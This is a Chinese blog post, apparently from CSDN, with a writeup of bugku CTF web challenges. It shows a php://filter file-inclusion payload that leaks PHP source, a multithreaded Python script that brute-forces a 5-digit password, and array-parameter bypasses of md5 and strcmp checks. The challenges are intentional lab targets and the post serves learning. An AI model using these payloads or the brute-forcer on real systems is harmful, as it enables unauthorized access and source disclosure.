bugkuCTF Writeup (Web)15-21

最新推荐文章于 2024-08-10 02:34:02 发布
最新推荐文章于 2024-08-10 02:34:02 发布
阅读量4.8k 收藏 3
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/troublor/article/details/79163574
版权

Web4

第十五题
看源代码,一大堆东西解码,发现eval执行的是:

function checkSubmit() {
    var a = document.getElementById("password");
    if ("undefined" != typeof a) {
        if ("67d709b2b54aa2aa648cf6e87a7114f1" == a.value) return !0;
        alert("Error");
        a.focus();
        return !1
    }
}

document.getElementById("levelQuest").onsubmit = checkSubmit;

总之就是要把form提交上去,于是直接去用postman提交,提交的password就是代码里的那一串字符串
这里写图片描述
取得flag

Web5

这里写图片描述
第一反应看源码,一大堆[]!()+那肯定就是jother了
扔进console执行这段jother
这里写图片描述
输出就是flag

flag在index里

这里写图片描述
题目提示flag在index里,那就是要看index的源码了
点一下链接发现url变成了

http://120.24.86.145:8005/post/index.php?file=show.php

以为是源码泄露什么的,去请求.swp .bak文件,无果
很长时间都无解,后面的题都做完了这道题依然毫无头绪,估计是碰到没接触过的知识点了
去查了一下发现使用php://filter协议
链接一下大牛的文章: leavesongs
基本上原理就是利用php://filter在执行index.php之前将其内容用base64编码,这样就掩盖了<?php,导致无法执行直接输出,输出的是base64编码之后的内容,再解一下码就可以了
payload:http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=./index.php

输入密码查看flag

这里写图片描述
输入框提示要输入5位数字密码
这里写图片描述
第一反应是传统的sql注入,试了各种方法,都不行,可能过滤的比较严
徘徊之时,突然发现url上有baopo 这样的汉语拼音,这不就是爆破 嘛,果断暴力破解
Python3代码:

import requests
import threading

psw = 0
lock = threading.RLock()
gotit = False
correct = ""


class BreakThread(threading.Thread):
    def run(self):
        global psw, gotit, correct
        while True:
            lock.acquire()
            if psw > 99999 or gotit:
                lock.release()
                break
            d = {
                "pwd": str(psw).zfill(5)
            }
            psw = psw + 1
            lock.release()
            r = requests.post("http://120.24.86.145:8002/baopo/?yes", data=d)
            r.encoding = "utf-8"
            try:
                r.text.index("密码不正确")
            except ValueError:
                print(d["pwd"] + "   right")
                gotit = True
                lock.acquire()
                correct = d["pwd"]
                lock.release()
                break
            else:
                print(d["pwd"] + "   wrong")


l = []
for i in range(2):
    l.append(BreakThread())
for i in l:
    i.start()
for i in l:
    i.join()
print("正确密码:"+correct)

这里我就开了2个线程,开太多会网络阻塞
跑出来密码是13579

前女友

这里写图片描述
藏在源代码里面有一个链接,点开又是php绕过,这回是md5
这里写图片描述
md5函数处理的必须是字符串,如果传入的是数组就可以绕过判断
strcmp也有漏洞,比较的必须是字符串,如果是数组同样也可绕过
payload: http://47.93.190.246:49162/?v1[]=sdfsdf&v2[]=sadf&v3[]=bbb

JavaScript

这里写图片描述
让我点一百万次???
我就只点一次源代码
javascript代码中,当点击次数达到1000000次的时候,发送一个post请求,那我就直接用postman发就好了
这里写图片描述

听说备份是个好习惯

这里写图片描述
打开一串看不懂的东西
提示说到“备份”,可能是备份文件泄露,于是用了一个php代码泄露检测的小工具SourceLeakHacker
检测了一下发现了index.php.bak文件,打开来
这里写图片描述
类似的md5绕过,只是前面加了一些简单的过滤,和之前几题有很多相似之处
payload: http://120.24.86.145:8002/web16/?kkeyey1[]=1&kkeyey2[]=wqerqwe

PS:前面的那个python多线程脚本,线程开到5个跑到三千多的时候就和服务器断连了,不知道为什么,这才减少到两个线程

Troublor
关注
专栏目录
BUGKU-WEB
wojiushilsy的博客
02-22 522
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
bugku-writeup-web-好像需要密码
dark的博客
06-15 1072
bugku-web15解题思路记录。” 题目:好像需要密码
Bugku web(1—35)
weixin_30376163的博客
11-15 538
1.web2 打开网页: 哈哈,其实按下F12你就会发现flag。 2.计算器 打开网页,只是让你输入计算结果,但是发现只能输入一个数字,这时按下F12,修改一下参数,使之可以输入多个数字,修改后输入结果就拿到flag了。 3.web基础$_GET 30 打开网页,审计一下大概是要让其得到一个what=flag,于是在URL后面加上?what=fl...
BugKu CTF Misc:眼见非实 & 啊哒 & ping & Snowfall
最新发布
Flag少侠的博客
08-10 8815
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
Bugku-web
qq_45987641的博客
12-25 171
bugku-web wp 13.打开网页也不知道是什么gui蹲西 点击测试网页,发现url 为:“http://your test ip/index.php?file=show.php”中参数有file选项,让我们联想到了文件包含漏洞。构造url=“http://your test ip/index.php?file=php://filter/read=convert.base64-encode/resource=index.php” , 网页返回base64 php://filter/read/conv
bugku web
沐目的博客
05-06 986
bugku web8 可算是自己写出来一道代码审计的题,虽然比较简单。 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "&...
BugKuWeb
paintShadow的博客
08-21 426
一、秋名山老司机 打开链接要求两秒之内计算出结果 明显跑脚本,代码如下: import requests import re url='http://123.206.87.240:8002/qiumingshan/' r = requests.session() requestpage = r.get(url) ans = re.findall('<div>(.*?)=?;</...
bugku-writeup-web-社工-初步收集
dark的博客
06-18 704
题目:社工-ch
bugku-writeup-web-文件包含
热门推荐
dark的博客
06-14 1万+
bugku-web13解题思路记录。” 题目:click me? no
BugkuCTF——最新webwriteup(持续更新)
1匹黑马
11-16 3793
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
bugkuCTF Writeup (Web)1-9
Troublor的博客
01-23 1890
签到题 加群就行了,没卖什么关子:) Web2 花里胡哨的果断去看源码。。。 flag就在这了 文件上传测试 就按照上面说的,传一个php试试 提交后说:非图片文件 那就是既要是图片又要是php了 暂时不知道它是怎么判断是图片是php文件的,先试试再说 用Fiddler抓包 先改一改文件扩展名试一试吧 后缀改成jpg之后,仍然提示是非
Bugku的WEB
qq_45946385的博客
07-29 200
这里写目录标题1.web22.计算器3.web基础$_GET4.web基础$_POST5.矛盾6.web37.域名解析8.你必须让他停下9.本地包含10.变量111.web5 1.web2 源代码 KEY{Web-2-bugKssNNikls9100} 2.计算器 字数限制了改一下我改成10了 flag{CTF-bugku-0032} 3.web基础$_GET 直接改?what=flag fl...
bugku - Web
UP's blog
09-03 2333
刚刚入门CTF,如有错误,望大佬指教
BUGKU--web
lulu001128的博客
04-17 138
解题过程
bugku--web
lulu001128的博客
04-20 264
解题过程
Bugku——web
chongya927的博客
03-05 1485
菜鸟学习CTF之路
BugKu:Web
qq_50034496的博客
07-30 2046
BugKu:Web
Bugku-Web(一)
weixin_44866139的博客
02-15 482
Web2 查看网页源代码 计算器 方法一:发现只能输入一个字符,修改源码 方法二: 该验证码并没有用表单验证,那该题是用什么验证机制呢? 之后查看js文件,发现了flag Web基础$_GET 题目给了很明显的提示 Web基础$_POST 由POST求方法可知只要传递相应参数即可获得相应内容 方法一:hackbar 方法二:BurpSuite抓包 方法三:python的requ...
BugKu Web WP
AlexYoung28的博客
08-23 558
变量1 这道题要好好说一下,因为以前不太知道这个套路。 我们来看看源码: 这个代码最重要的两部分:一是 正则匹配,对我们输入的进行检查。  二是  var_dump($$args)  这句代码。 我们可以想到 如果我们的 $args 的值 刚好是 这个php代码中的一个变量名称,那么我们 是不是就可以通过 $$args  将这个变量打印出来了。例如: 那么接下来,我们就该想到,我...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值